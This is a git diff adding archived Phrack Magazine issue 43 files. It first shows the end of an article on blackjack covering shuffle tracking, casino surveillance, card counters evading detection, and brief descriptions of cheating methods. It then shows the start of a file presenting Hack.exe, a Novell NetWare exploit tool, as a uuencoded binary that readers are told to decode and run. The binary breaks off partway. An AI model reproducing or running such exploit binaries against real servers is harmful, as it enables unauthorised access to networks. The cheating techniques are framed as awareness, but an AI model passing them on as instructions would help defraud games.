+removed through many shuffles.
+
+   What if the players are winning the 40 hands and the dealer only 20? If the
+dealer has been mentally keeping track of how many hands each side has won in
+the shoe, the dealer will probably do one of two things. One is to keep the
+shuffle the same, but 'strip' the deck. When a dealer strips a deck, he/she
+strips off one card at a time from the shoe letting them fall on top of one
+another onto the table. This action causes the order of the cards to be
+reversed. The main consequence is to dissipate any clumping advantages (a bunch
+of tens in a clump) that the players may have. The second thing the dealer may
+do is simply change the way they shuffle to help randomize the cards.
+
+   I personally believe that casinos use certain shuffles on purpose for the
+sole reason that they gain some sort of advantage. A BlackJack dealer friend
+of mine disputes the whole theory of card clumping and shuffle tracking
+though. The mathematics and simulation prove the non-random nature of certain
+shuffles under controlled conditions. Perhaps in an actual casino environment
+the effect isn't as high. Regardless, next time you are playing in a casino
+and its time to shuffle a shoe, ask the dealer to CHANGE they WAY he/she
+shuffles. The answer will nearly always be NO. Try to appeal to the pit boss
+and he/she will probably mumble something about casino policy. Why are they
+afraid to change the shuffle?
+
+Relevant Reading: [4], [5] Chapters 5 and 6 pages 71 to 98, [14] pages 463
+to 466, and [15] which is very detailed and accessible via Internet FTP.
+
+
+Casino Security and Surveillance:
+--------------------------------
+
+   I figured this section might get some people's attention. It is important
+to know what the casino is capable of as far as detecting cheating (by
+employees and customers) and spotting card counters.
+
+EYE IN THE SKY: A two way mirror in the ceiling of the casino. It's not hard
+to spot in older casinos as it usually is very long. Before 1973 or so,
+employees traversed catwalks in the ceiling and it was easy for dealers and
+players to hear when they were being watched. Sometimes dust from the ceiling
+would settle down onto a table when someone was above it. Newer casinos use
+those big dark plexiglass bubbles with video camera's which should be watched
+constantly. These cameras have awesome Z00M capabilities and according to
+Reference [9], the cameras can read the word "liberty" on a penny placed on a
+BlackJack table. I am sure the resolution is better than that for the latest
+equipment. The video images are also taped for use as evidence should anything
+that is suspect be detected. Just like computer security audit logs, if no one
+pays attention to them, they don't do much good. If you want a job monitoring
+gamblers and casino employees, you need to train for about 500 hours (about
+twenty 40 hour weeks) to learn all the tricks people try to pull on you.
+Pretty intensive program wouldn't you say?
+
+CASINO EMPLOYEES: Then there are the casino employees. The dealers watch the
+players, the floor men watch the dealers and the players, the pitbosses watch
+the dealers, the floormen, and the players, etc. There may be plain clothes
+detectives roaming about. In a casino, everyone is suspect.
+
+BLACK BOOK: A company that you will see mentioned in a lot of casino books is
+Griffin Investigations. They periodically update a book that casino's
+subscribe to that have pictures and related info on barred card counters and
+known casino cheats.....I suppose the "black book" as it is called, is
+analogous to the "Bell security hit-lists", that had (have?) files on known
+phreaks and hackers.
+
+
+Social Engineering the Casino:
+------------------------------
+
+   If you are good at getting an ESS operator to enter NET-LINE on DN COE-XXXX,
+and at getting those "Engineering Resistant Hard Asses up at SNET (Southern
+New England Telephone)" [as The Marauder affectionately calls them] to give
+you the new CRSAB number; then this section will be a piece of cake for you
+to master.
+
+   References [3], [7], and [8] have many stories regarding playing in
+casinos, getting barred, and various exploits. I am not going to repeat any of
+them here. In each of those books, the authors talk about their first
+experiences getting barred. In each case they were fairly bewildered as to why
+they were kicked out, at least until some casino employee or owner told them
+things like "you're just too good" and the ever diplomatic: "we know your
+kind, get the hell out!".
+
+   As you probably have gathered thus far, card counters are as undesirable in
+a casino as a phone phreak is in a central office. There are a number of
+behavioral characteristics which have been attributed to the 'typical' card
+counter. Probably the most obvious act of a counter is a large increase in bet
+size. If you recall in the Card Counting section, when the deck is favorable,
+you bet more. When the deck is unfavorable, you bet less. Dr. Thorp's original
+system required a variation in bet size from one to ten units. When the deck
+is favorable the system may dictate that you go from a ten dollar bet to a
+hundred dollar bet. Kind of gets the attention of the dealer and the pit boss.
+However, this type of wild wagering is typical of big money hunch bettors.
+Hunch betters will just plop down a bunch of chips at random due to 'hunches'.
+Therefore, a large increase in bet size won't necessarily cause you to be
+pegged as a counter.
+
+   Intense concentration, never taking your eyes off the cards, lack of
+emotion...ie, playing like a computer, is pretty much a give away that you are
+counting. Other things such as 'acting suspicious', meticulously stacking your
+chips, betting in discernable patterns, and a devout abstention from alcohol
+may also attract unwanted attention.
+
+   Another criteria used for spotting counters is if there are two or more
+people playing in concert with one another. Ken Uston is famous for his
+BlackJack teams. They have literally won millions of dollars collectively.
+When the "Team-LOD" gets together to play, we have to pretend we don't know
+each other so as not to attract undue attention ;-)
+
+   What I mean by Social Engineering the casino is to list ways that trick the
+casino into thinking you are just a dumb tourist who is throwing money away.
+Look around, smile, act unconcerned about your bet, don't be afraid to talk to
+the dealer, floorperson, or pit boss. Don't play 8 hours straight. Perhaps
+order a drink. Things of this nature will help deflect suspicion.
+
+   I only recall attracting attention once. The casino wasn't very busy, there
+were 3 people at the table including myself. I only had about an hour to play
+so I bet aggressively. I started with $5 and $10 but made some $50.00 bets
+whenever I got a feeling that I was going to win the next hand (quite the
+scientific strategy I know). A woman next to me who seemed to be a fairly
+seasoned player made a comment that I was a little too aggressive. The pit boss
+hovered about the table. My hour was nearly up, I bet $10.00 for the dealer and
+$50.00 for myself. I lost the hand leaving me only $100.00 ahead, and left. The
+only thing I could think of besides the betting spread which really wasn't a
+big deal was that the casino was FREEZING inside. I was shivering like hell,
+it probably looked like I was shaking out of fear of being spotted as a
+counter or worse...a cheater.
+
+   So what if a casino thinks you are counter? To be honest, there have
+probably been less than 1000 people who have been permanently barred from play
+(ie, they have their mugs in the black book). A far greater number have been
+asked to leave but were not prevented from returning in the future.
+
+   Tipping the dealer may not necessarily get the casino off your back but
+certainly doesn't hurt. When you toke the dealer, place the chip in the corner
+of your betting box a few inches from your bet. You may want to say "we are in
+this one together" or some such to make sure they are aware of the tip. This
+approach is better than just giving them the chip because their 'fate' is tied
+in with yours. If your hand wins, 99 out of 100 times they will take the tip
+and the tip's winnings off the table.
+
+   The 1 out of 100 that the dealer let the tip+win ride happened to me over
+and over again for the better part of a day. It was a week before I had to go
+back to college and I was broke, with no money to pay the deposits for rent
+and utilities. Basically, if I didn't come up with some money in 7 days, I was
+not going back to school. This was 4 years ago BTW. I took out $150 on my
+credit card (stupid but hey, I was desperate) and started playing and winning
+immediately. I pressed my bets time and time again and in an hour or two had
+$500 in front of me (+$350). I started losing a bit so I took a break for a
+short while. I went back to a different table with a different dealer. As soon
+as I sat down I started winning. I started to tip red chips ($5.00) for the
+dealer. The first couple of times he took the $10.00 right away. I kept
+winning steadily and continued to toke him. Then he started to let the $10.00
+ride! I was amazed because I had never seen that before. That is when I knew I
+was HOT. If the dealer is betting on you to win, that says something. When I
+stopped playing I cashed in eight black chips. I left with eight one hundred
+dollar bills, a net profit of $650.00, just enough to cover everything. Whew!
+I probably tipped close to $100.00 that day, and the dealer must have made
+double to triple that due to him betting with me. There were a number of times
+when the pit boss wasn't close that the dealer would IGNORE my hit or stand
+signal. The first time he did this I repeated myself and he did what I asked
+but gave me a 'look'. Needless to say, I lost the hand. After that, if he
+'thought' I said stand, I didn't argue. This occurred when he had a ten as the
+up-card so he knew his total from peeking at the hole card. I am not sure if
+this is considered cheating because I did not ask him to do this, nor did we
+conspire. It just happened a few times, usually when I had $25-$50 bets on the
+line which is when I made sure to throw in a red chip for him.
+
+
+Casino Cheating and Player Cheating:
+------------------------------------
+
+   Cheating by the house is rare in the major casinos ie, those located in
+Nevada and Atlantic City. The Nevada Gaming Commission may revoke a casino's
+gambling license if a casino is caught cheating players. Granted, there may be
+a few employees (dealers, boxmen, whomever) that may cheat players, but it is
+extremely doubtful any casino in Nevada or Atlantic City does so on a
+casino-wide scale. You definitely should be wary of any casino that is not
+regulated such as those found on many cruise ships. Because a casino does not
+have to answer to any regulatory agency does not mean it is cheating players.
+The fact is that casino's make plenty of money legitimately with the built-in
+house advantages and don't really need to cheat players to survive. I provide
+some cheating methods here merely to make you aware of the scams. These
+techniques are still carried out in crooked underground casinos and private
+games.
+
+   The single deck hand-held BlackJack game is quite a bit more susceptible to
+cheating by both the dealer and the player than games dealt from a shoe. The
+preferred method of dealer cheating is called the "second deal". As you may
+infer, this technique requires the card mechanic to pretend to deal the top
+card but instead deals the card that is immediately under the top card.
+Imagine if you could draw a low card when you need a low card, and a high card
+when you need a high card. You could win large sums of money in a very short
+period. Well, a dealer who has the ability to execute the demanding sleight of
+hand movements for second dealing can drain even the best BlackJack player's
+bankroll in short order.
+
+   If someone is going to deal seconds, they must know what the second card is
+if he or she is to benefit. One way to determine the second card is by
+peeking. A mechanic will distract you by pointing or gesticulating with the
+hand that is holding the deck. "Look! There's Gail Thackeray!". While you are
+busy looking, the dealer is covertly peeking at the second card. A more risky
+method is pegging. A device called a pegger is used to put small indentations
+in the cards that the dealer can feel. Pegging all the ten value cards has
+obvious benefits.
+
+   Another method is the "high-low pickup". I like this one because it's easy
+for a novice to do especially in a place where there are a lot of distractions
+for the players. After every hand, the dealer picks up the cards in a high-low
+alternating order. The mechanic then proceeds with the "false shuffle" in
+which the deck is thought to have been shuffled but in reality the cards
+remain in the same order as before the shuffle. As you well know by now, a
+high-low-high-low arrangement of the cards would be death to the BlackJack
+player. Get dealt a ten and then a 5, you have to hit, so get another ten.
+Busted. Since the dealer doesn't lose until he/she busts, all the players who
+bust before lose. Bottom dealing and switching hole cards are other techniques
+that may be used to cheat players.
+
+   For shoe games, there is a device called a "holdout shoe" that essentially
+second deals for the dealer. Discreet mirrors and prisms may be contained in
+the holdout shoe which only allow the dealer to see what card is next.
+Shorting a regular shoe of ten cards will obviously have a detrimental effect
+on the BlackJack player.
+
+   Player cheating isn't recommended. However, I'll quickly list some of the
+methods for awareness purposes. The old stand-by of going up to a table,
+grabbing some chips, and running like hell is still done but certainly lacks
+originality. Marking cards while you play is another popular method. "The
+Daub" technique is done by clandestinely applying a substance that leaves an
+almost invisible smudge on the card. High value cards like tens are usually
+the targets. One scam mentioned in one of the references was the use of a
+special paint that was only visible to specially made contact lenses. The
+"hold out" method requires the palming of a card and substituting a better
+one. This is usually done when there is big money bet on the hand. One of the
+risks to these methods is when the deck is changed since the pit boss always
+scrutinizes the decks after they are taken out of play.
+
+   Other methods entail playing two hands and switching cards from one hand to
+the other, counterfeiting cards and/or casino chips, adding chips after a
+winning hand (I have seen this done twice, couldn't believe my eyes but
+certainly wasn't going to RAT the thieves out). Some dealers may be careless
+when looking at their hole card for a BlackJack. A person behind the dealer on
+the other side of the pit may be able to discern the card. The value is then
+signalled to a player at the table. Astute pit bosses may notice someone who
+is not playing that scratches their head too much though. Wireless signalling
+devices have been used for various purposes but some casinos have new
+electronic detection systems that monitor certain frequencies for activity.
+
+
+Some Comments Regarding Computer BlackJack Software for PC's:
+---------------------------------------------------------------
+
+   I strongly recommend that you practice using a BlackJack program of some
+kind before going out to play with real cash. The first program I used for
+'training' some years ago was "Ken Uston's BlackJack" on my old Apple ][+.
+Later I acquired "Beat The House" for the same machine. I recently bought a
+program for my IBM and have been using it to refresh my memory regarding basic
+strategy, card counting, and money management techniques. I assume you will
+recognize the guy's name in the title now that you have read most of this
+article. I bought: "Dr. Thorp's Mini BlackJack" by Villa Crespo Software at a
+Wal-Mart of all places for a measly $7.88. This is an abridged version
+however. Villa Crespo charges $12.95 for it if you order via mail. They also
+offer an unabridged version for $29.95 via mail. Villa Crespo (don't ask me
+where they got that name) offers other programs for Craps, Video Poker, and
+7-Card Stud in case you are interested in those games of chance. By the way,
+on the order form I also noticed "FAILSAFE Computer Guardian (Complete
+protection and security for your system)" for $59.95. For some reason any time
+a piece of paper has the word 'security' on it, my eyes zero in on it....
+
+   Some features that I liked about this scaled down version of their
+BlackJack program were the TUTOR, which advises you on whether to hit, stand,
+take insurance (no way), etc. as per Basic Strategy. The Tutor for the
+abridged version does NOT take into consideration the card count when making
+recommendations though. If you are counting the cards, the program keeps count
+also, so if you lose count you can check it by pressing a function key. The
+STATS option is neat since it keeps track of things such as how many hands
+were dealt, how many you won/lost, etc. and can be printed out so you can
+track your progress. The program allows you to save your current session in
+case you get the urge to dial up the Internet to check your email, something
+that should be done every hour on the hour....
+
+   One thing I did not like about the program was that it allowed you to bet
+over your bankroll. I accidentally pushed [F2] (standardized at $500.00 a
+bet instead of [F1] (standardized at $5.00 a bet) ---- a slight difference in
+wager I'd say. Having only $272.00 in my bankroll didn't stop the program from
+executing the command and in my opinion it should have prevented the overdraft.
+
+   The first time I played Dr. Thorp's Mini BlackJack, it took me about 95
+hands to double my money. I started with $200.00, bet from $5.00 to $25.00,
+never dropped below $180.00 which surprised me, and received 3 BlackJacks. I
+won 63 hands, and lost 32. I played head on against the dealer, although the
+program allows for up to 6 players. I consider that lucky since I had my fair
+share of going broke in later sessions.
+
+   My advice when using a BlackJack computer program is: do not start with a
+bizzillion dollars or anything like that. Start with the amount that you truly
+plan to use when you sit down at an actual table. If you play in a crowded
+casino, all the low minimum bet tables (ie: $1.00 to $5.00) will most likely be
+filled to capacity and only $10.00 or $15.00 tables will have openings. Keep
+this in mind because when you make bets with the computer program, you should
+wager no less than whatever the minimum will be at the table you sit down at.
+If your bankroll is only $200.00 playing at anything more than a $5.00 minimum
+table is pushing it.
+
+   Another thing to note is that playing at home is kind of like watching
+Jeopardy on TV while you are sitting on the couch. People who have been on the
+show always say it was much harder than when they blurted out answers during
+dinner with their mouths full (the Heimlich maneuver--a real lifesaver!). The
+same thing goes for BlackJack. When you are sitting at an actual table, your
+adrenaline is flowing, your heart starts to pump faster, you make irrational
+plays especially when you start losing, and odds are you will forget things
+that were memorized perfectly. There is no substitute for the real thing and
+real experience.
+
+
+Quick Comments on Other Casino Games:
+-------------------------------------
+
+   A few people suggested I briefly mention some of the other casino games so
+I added this section. I don't go into much detail at all as this file is too
+unwieldy already. Besides, if you want to know more, I am sure you'll pick up
+the appropriate reference. Hundreds of books have been published on gambling
+and they are available by contacting [2]. My aim here was to mention details
+that most people may not be aware of.
+
+BACCARAT: This is the game you see in movies a lot. See [12]'s FAQ for a good
+explanation of this game.
+
+CRAPS: Craps is probably the most complicated casino game as far as the
+different ways to bet things are concerned but its really not that hard to
+learn. I just want to throw one table at you adapted from Reference [13]. The
+table won't make much sense unless you are already familiar with craps. In
+case you have forgotten or didn't know, craps is 'that dice game'. The purpose
+of presenting it is to save you $$$$$ <-- Still love that dollar sign key! hehe
+
+                         Lamest Bets at the Craps Table
+
+                BET            PAYS     SHOULD PAY   YOUR ADVANTAGE
+              -------------------------------------------------------
+              Any-7            4  to 1     5 to 1         -16.7 %
+              2 (or 12)        30 to 1    35 to 1         -13.9 %
+              Hard 10 (or 4)   7  to 1     8 to 1         -11.1 %
+              3 (or 11)        15 to 1    17 to 1         -11.1 %
+              Any Craps        37 to 1     8 to 1         -11.1 %
+              Hard 6 (or 8)    9  to 1    10 to 1         -9.1  %
+
+SLOTS: Playing slots is a gamble. Obviously you say. No, I mean its a gamble
+to play them. House advantages are almost never displayed on a particular slot
+machine. Different machines and different locations may have different casino
+win percentages. When you go up to a slot machine, you have no idea if its'
+advantage over you is 5% or 25%. Unless you have been watching it, you don't
+know if it just paid off a big jackpot either. I don't play slots as a matter
+of principle. If you do play I think there are still some $.05 slots in Vegas.
+Play the nickel slots and keep your shirt, especially if its an LOD T-shirt.
+
+VIDEO POKER: Reference [13] gives the following advice regarding video poker:
+"...don't expect to win. Manage your money so that you limit your losses." I
+think its a bit negative but I can't argue with the logic. Also, as with
+slots, you may want to play at a machine that is networked with others which
+has a progressive payoff. This way at least you have a chance of making the
+big bucks in addition to those periodic small payoffs.
+
+VIDEO BLACKJACK: If you like to avoid people and like BlackJack, you may be
+thinking that this is a great way for you to "hack two systems with one
+password" and make a little money on the side. Before you start putting
+quarter or dollar tokens into video BlackJack machines there are a couple of
+things to know. First, you can't use card counting techniques because
+every hand is essentially dealt from a new deck. When the computer deals a
+hand it is just providing 'random' cards. Perhaps if you saw the source code,
+you may be able to determine some sort of bias but I suspect it would be
+minuscule at best. The rules vary from machine to machine and the maximum
+allowable bet varies also. As with the video poker and video slot machines,
+the owner of the machine may set the options to their taste (amount of profit).
+
+
+Selected Bibliography:
+----------------------
+
+The following are some references you may want to check out and some of my
+sources of information for this article. They are not in any particular order
+and the format is far from standard as opposed to my thesis bibliography :)
+
+[1] "BlackJack Forum Newsletter" by RGE Publishing in Oakland California. This
+is a quarterly publication which has the location and rule variations info
+(among other things) for casinos in the state of Nevada.
+
+[2] The Gamblers Book Club (its really a store) can sell you a sample of the
+BlackJack Forum Newsletter for $10.00. They have all kinds of new and out of
+print books, used magazines, etc. They are located in Vegas (630 S. 11th St.)
+so stop by in person or call 1-800-634-6243 which was valid as of 6/1/93 since
+I just gave them a ring...the guy I spoke to was very nice and helpful so I
+thought I'd give them a plug here.
+
+[3] "Beat The Dealer" by Dr. Edward O. Thorp. Make sure you get the SECOND
+edition (1966) since it has Dr. Julian Braun's additions to the original 1962
+edition.
+
+[4] "Gambling Times Magazine" (now defunct), 'BlackJack Bias Part 1 and 2' July
+and August 1987 Issues by Mason Malmuth. This magazine was great because it
+kept you up to date on the latest in gambling systems and what casinos are up
+to. The article is about the author using his PC to perform simulations
+regarding the effects of non-random card distribution on BlackJack.
+
+[5] "Break The Dealer" by Jerry L. Patterson and Eddie Olsen, 1986 Perigee
+Books. Worth the money for the chapters on Shuffle Tracking alone.
+
+[6] "The Optimum Strategy in BlackJack" by Roger R. Baldwin, Wilbert E.
+Cantey, Herbert Maisel, James P. McDermott. Journal of the American
+Statistical Association, September 1956. Eight of ten pages are mathematics.
+
+[7] "The World's Greatest BlackJack Book" revised edition (1987) by Dr. Lance
+Humble and Dr. Carl Cooper, Doubleday. I am not sure it is THE world's
+greatest, but it is an excellent book. It is 400 pages and provides more
+details than you probably care to know about the Hi-Opt I counting system.
+
+[8] "Turning the Tables on Las Vegas" by Ian Anderson, 1978. This is an
+excellent book if you were interested in The Social Engineering the Casino
+section. The author shares a lot of interesting and funny stories that can
+keep you from getting barred. Note that 'Ian Anderson' is the authors' handle.
+
+[9] "Las Vegas, Behind the Tables" by Barney Vinson, 1986, Gollehon Press.
+Written by a casino executive, I found it to be quite illuminating.
+
+[10] "Gambling Scams" by Darwin Ortiz, 1990, Carrol Publishing. If you play in
+any private games, be sure to read this one to avoid getting screwed. It even
+has a section on crooked carnival games.
+
+[11] "Winning Without Counting" by Stanford Wong. This book has an interesting
+section on 'Dealer Tells' and how to exploit them.
+
+[12] "Rec.Gambling" Internet USENET Newsgroup. The rec.gambling newsgroup is
+an excellent free source of current information on BlackJack and other games.
+People who have just gotten back from various casinos post about their playing
+results and the treatment from casinos. One person just posted that he was
+barred from playing BlackJack (a casino employee told him he could play any
+game in the casino EXCEPT BlackJack) after he was ahead only $40.00. The
+reason apparently was due to his fairly mechanical play and betting. The
+rec.gambling FAQ was message #15912 when I read the newsgroup on 6/8/93. They
+plan on posting the FAQ every month or so. I found the FAQ to be very
+informative. There is an alt.gambling newsgroup but it is dead with 0
+messages.
+
+[13] "The Winner's Guide to Casino Gambling", revised edition by Edwin
+Silberstang, 1989 Plume printing. This book covers a wide range of casino
+games and has a large list of gambling terms in the back.
+
+[14] "Gambling and Society" edited by William R. Eadington, 1976. This book
+provides plenty of information on the psychology of gambling. I found the
+section on 'Who Wants to be a Professional Gambler?' interesting as the study
+indicates the types of vocations that show high correlations with being a
+professional gambler. One of those vocations with an 'extremely high
+correlation' was being a Secret Service agent. Maybe Agent Foley will change
+jobs.....he can't do much worse, ahem. Chapter 24 by James N. Hanson is
+entitled "Nonlinear Programming Simulation and Gambling Theory Applied to
+BlackJack" which some of you programmers might be interested in.
+
+[15] "The BlackJack Shuffle-Tracking Treatise" by Michael R. Hall accessible
+via the Internet by anonymous FTP: soda.berkeley.edu in the
+pub/rec.gambling/blackjack directory. This is a very detailed 78K file that
+was well done. It provides plenty of the nitty-gritty details that I did not
+have the space to mention in this article. I highly recommend it.
+
+[16] "Risk of Ruin" by Michael R. Hall available from same source as [15]
+above. This paper provides some mathematical formulas for helping you
+determine the likelihood of losing portions of your starting bankroll.
+Although the equations look complicated, anyone with a $10. scientific
+calculator can use them. The author provides source code for a program written
+in C that calculates the risk formula. Also get his "Optimal Wagering" file
+which helps you determine your bet size.
+
+[17] The movie: "Fever Pitch" starring Ryan 'O Niel. This is the most realistic
+movie I have seen regarding the psychology of a gambler. If I recall correctly,
+it was made in 1985 and is in most video rental stores.
+
+
+Final Comments:
+---------------
+
+   Let me quickly thank those who took the hour to read my article, recommended
+corrections and offered their insightful comments: The Marauder, Mark Tabas,
+Professor Falken, Al Capone, Jester Sluggo, and Bruce Sterling. Also, I would
+like to thank JLE, my 'gambling mentor' mentioned earlier even though he
+doesn't know me as 'lex' and probably will never see this file.
+
+   If anyone has comments, corrections, etc. feel free to email me. Kindly
+note that I have no interest in receiving flames from any self professed
+BlackJack experts out there as I do not claim to be an expert and due to size
+restrictions, I couldn't get all that complicated regarding counting
+techniques and such. Besides, anyone who wants to get serious will take the
+time to thoroughly read the references listed in the previous section. My main
+purpose was to familiarize you with the game of BlackJack and provide a
+resource which can point you in the right direction for more in-depth
+information. Thank you for your time and I hope you learned something from
+this article even if you don't put any of the information to use.
+
+   If you have something really SEKRET to tell me, here is my PGP Public Key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.2
+
+mQCNAiwEHN4AAAEEAMtDxWI2HYsAQO8QhDBYhHvmn3fzGpKFbimxl34XiQ5woU/K
+lqbD53ahfnB9ST22yxEvexXW0VGVVfSp9xiUl7d7RsTm7Uas3OaOOiSFIRCVvcG8
+FnWARH0nmELBXYkXXjjvjm2BiCEkn45eFaZPX7KbCuIGVjCe3zltpJGBK2OvAAUR
+tCRMZXggTHV0aG9yIDxsZXhAbWluZHZveC5waGFudG9tLmNvbT4=
+=LOXY
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+                 End of "How To Hack BlackJack": File 2 of 2
\ No newline at end of file
diff --git a/phrack43/11.txt b/phrack43/11.txt
new file mode 100644
index 0000000..7171a05
--- /dev/null
+++ b/phrack43/11.txt
@@ -0,0 +1,781 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 11 of 27
+
+                     Help for Verifying Novell Security
+                                 Provided By
+                               Phrack Magazine
+
+In nearly a year since their release, the programs Hack.exe and View.exe
+are still potential threats to the security of Novell Networks.  Despite
+Novell's commendable response with a patch for the holes these programs
+exposed, many system administrators have not yet implemented the fix.
+
+We at Phrack encourage system administrators to uudecode and execute the
+following programs to determine whether or not their servers are at
+risk.
+
+The patches, SECUREFX.NLM for Netware 3.11, and SECUREFX.VAP for Netware
+2.2 are available via Novell's NetWire, or from ftp.novell.com.  Users
+with additional questions about Netware security can call Novell
+directly at 800-638-9273.
+
+------------------------------------------------------------------------
+
+begin 777 hack.exe
+M35HA 2L 6 %@ )H __\,!0 (%10Z *@ '@    $ ) #B!"( X@0@ .($'@#B
+M!!P X@0: .($& #B!!8 X@04 .($$@#B!!  X@0. .($# #B! H X@0( .($
+M!@#B! 0 X@0" .($  #B!"D"   . @  ^ $  .P!  #C 0  S0$  +<!  "K
+M 0  HP$  )L!  "3 0  A0$  &<!  !@ 0  &@$  !,!   & 0  \0   ,( 
+M  "[    JP   )X   "(    <@   %H    [    -    "P    D    '   
+M  \    )    =@0  &H$  !B!   6@0  #P$   U!   ' 0  !4$   -!   
+M! 0  /@#  #O P  WP,  -8#  ## P  NP,  *X#  "8 P  @@,  &$#  !4
+M P  /@,  !T#   0 P  ^@(  .H"  #B @  V@(  -$"  #* @  J@(  *,"
+M  "; @  A (  'T"   Y @  ,@(  -@&  "R!@  JP8  (8&  !_!@  <08 
+M %8&  !*!@  008  "0&   =!@  # 8   0&  #\!0  ] 4  .P%  #D!0  
+MS@4  +@%  "7!0  B@4  '0%  !M!0  904  %T%  !4!0  /@4   D%  #\
+M!   Y@0  +$$  "D!   C@0  (<$  #E"   V @  ,((  "["   > @  &@(
+M  !@"   6 @  $\(   T"   '@@  !((   )"   \P<  -T'  #$!P  O0< 
+M *,'  "7!P  CP<  (<'  !_!P  10<  !X'   (!P   0<  / &  #H!@  
+MWP8  'P*  !E"@  7@H  "@*   5"@  !@H  /()  #K"0  UPD  +()  "@
+M"0  B@D  '0)   ^"0  ,0D  !L)   / ( "-@"  L@ C0*K (T"G0"- G@ 
+MC0)5 (T".P"- BH C0(9 (T""P&= NL G0+" )T"G0"= H4 G0)D )T"20"=
+M C$ G0(@ )T"? "P E0 L (L + "B@.X DD"N +K ;@"Q &X JL!N *3 ;@"
+M#0&X O@ N +> +@"6P"X D8 N (L +@"0P>X C4'N (=![@""P>X NT&N +-
+M!K@"H :X H0&N )Y!K@"4@:X CP&N (,!K@" 0:X NH%N +1!;@"O 6X HP%
+MN *!!;@":@6X E$%N (\!;@"O 2X MP*N (T"K@"K@FX H4)N )L";@"00FX
+M A@)N (*";@"VPBX LT(N *U"+@"HPBX H((N )I"+@"/@BX @\(N (!"+@"
+MZ0>X M<'N *V![@"G0>X G('N (/ &D#*0!M X( = -K '0#5 !T S8 = ,<
+M 'P#90!^ T\ ?@,Y 'X#(P!^ P\ ?@.P (0#D0"$ W  A -3 (0#-@"$ W4 
+MD@-@ )(#/0"2 R, D@,2 )(#_@": ]0 F@.? )H#E ": W$ F@-0 )H#/P":
+M RT F@,< )H#9@;S T4 J !E *@ ;0"H +4 J "\ *@ P0"H -P J #B *@ 
+MY0"H /< J #\ *@ _@;S _L!J !T J@ B *H ,X"J #7 J@ -P6H !$&J " 
+M!J@ ;@:H %(&J  . .$$-@WS S -\P.8#O,#,0BH  P(J #K!Z@ 9P>H %H'
+MJ !/!Z@ . >H "X'J  @!Z@ =@BH &8*J !4"J@ 1PJH #<*J #_":@ S0FH
+M +H)J "I":@ $@FH  8)J #W"*@ ZPBH ,H*J  '"Z@ GP^H (H/J  F .($
+M>!.H .$2J !U$J@ -Q*H "X6J #1%Z@ _1>H +49J #&#O,#R@[S \X.\P/2
+M#O,#U@[S ]$;J                                               
+M                                                            
+M                                                            
+M        58OLN @ FI0"J !6F@0 9P,*P'0#Z5P*N'8#NJ\#4E"X' "ZKP-2
+M4+@& +JO U)0N$(#NJ\#4E":!P"  H/$$ O =0/I)PJ.!C /)J!" RKD4+A"
+M !Y0FC(&J "#Q :.!C(/)J & "KD4+A: !Y0FC(&J "#Q :.!C0/)O\V' "X
+M<@ >4)HR!J@ @\0&C@8V#R;_-G8#N(H 'E":,@:H (/$!KBB !Y0FC(&J "#
+MQ 2X, !0*\!0N$8#NJ\#4E":B!NH (/$"(X&. \FQ@9. _@FQ@9/ _@FQP90
+M T #)L<&: ," ";'!FH#I@(FQP9L Z\#)L<&;@,E ";'!G #6  FQP9R Z\#
+MN"8 4"O 4+BF KJO U)0FH@;J "#Q B.!CH/)L<&I@+__R;&!JL"$2;&!K8"
+M!";&!K<"42;&!L("0";&!L," R;'!L0"(B(FQ@;* A>X!@%0*\!0N%@ NJ\#
+M4E":B!NH (/$"(X&/ \FQ@9: $$FQ@9;   FQ@9<  &:"@!\ XX&/@\FHT0#
+MN&@"NJ\#4E"X7@&ZKP-24+CB ;JO U)0N"  NJ\#4E F_S9$ YH, (0#@\02
+MC@9 #R:C<@)0N*0 'E":,@:H (/$!HX&/@\F_S9$ [B\ !Y0FC(&J "#Q :X
+M( "ZKP-24+C4 !Y0FC(&J "#Q B.!D(/)O\VX@&X[  >4)HR!J@ @\0&C@9$
+M#R;_-F !)O\V7@&X! $>4)HR!J@ @\0(N"  NJ\#4E":ZAJH (/$! 5  (X&
+M. \FHW0#!28 B4;^C@8Z#XI&_RKDBF[^*LD#P2:CJ *#;OX"C@8\#XI&_RKD
+MBF[^ \$FHU@ N"  NJ\#4E":ZAJH (/$!(A&^HX&/ \FHET *N10N"  NJ\#
+M4E"X7@"ZKP-24)H"&Z@ @\0*BD;Z*N2+\(X&/ \FQH1>  ^X' $>4(V$7P"Z
+MKP-24)J*&J@ @\0(N @ NJ\#4E"X4 "ZKP-24+@" +JO U)0C@8^#R;_-D0#
+MF@P = .#Q Z.!D /)J-R E"X+ $>4)HR!J@ @\0&N$0!'E":,@:H (/$!,=&
+M_   BU[\C@9&#R:*AP( *N10N%D!'E":,@:H (/$!O]&_(-^_ 1\V[A> 1Y0
+MFC(&J "#Q 2X8 $>4)HR!J@ @\0$QT;\  "+7OR.!D@/)HJ'4  JY%"X=0$>
+M4)HR!J@ @\0&_T;\@W[\!GS;N'H!'E":,@:H (/$!(X&2@\F_S8( +A\ 1Y0
+MFC(&J "#Q :XE $>4)HR!J@ @\0$FE8 ?@..!DP/)J-P E"XE@$>4)HR!J@ 
+M@\0&N'0"NJ\#4E".!DP/)O\V< *:"P") H/$!KAT KJO U)0N*X!'E":,@:H
+M (/$"+AT KJO U)0N"  NJ\#4E":BAJH (/$"(X&0@\FQP;B 00 N,8!'E"X
+M# "ZKP-24)J*&J@ @\0(C@9.#R;'!J0" 0".!E /)L8&    N H NJ\#4E"X
+M  "ZKP-24+AX [JO U)0N $ 4+@, +JO U)0C@9"#R;_-N(!N"  NJ\#4E":
+M#@"= H/$&(X&0 \FHW("4+C2 1Y0FC(&J "#Q :XZ@$>4)HR!J@ @\0$QT;\
+M  "+7OR.!E(/)HJ'> ..!CH/)HB'K *+7OR.!E(/)HJ'> .84+C_ 1Y0FC(&
+MJ "#Q ;_1OR#?OP$?,>X! (>4)HR!J@ @\0$N 8"'E":,@:H (/$!,=&_ 0 
+MBU[\C@92#R:*AW@#C@8Z#R:(AZP"BU[\C@92#R:*AW@#F%"X&P(>4)HR!J@ 
+M@\0&_T;\@W[\"GS'N" "'E":,@:H (/$!+CF ;JO U)0N&(#NJ\#4E"X> .Z
+MKP-24)H" &T#@\0,C@9 #R:C<@)0N"("'E":,@:H (/$!K@Z AY0FC(&J "#
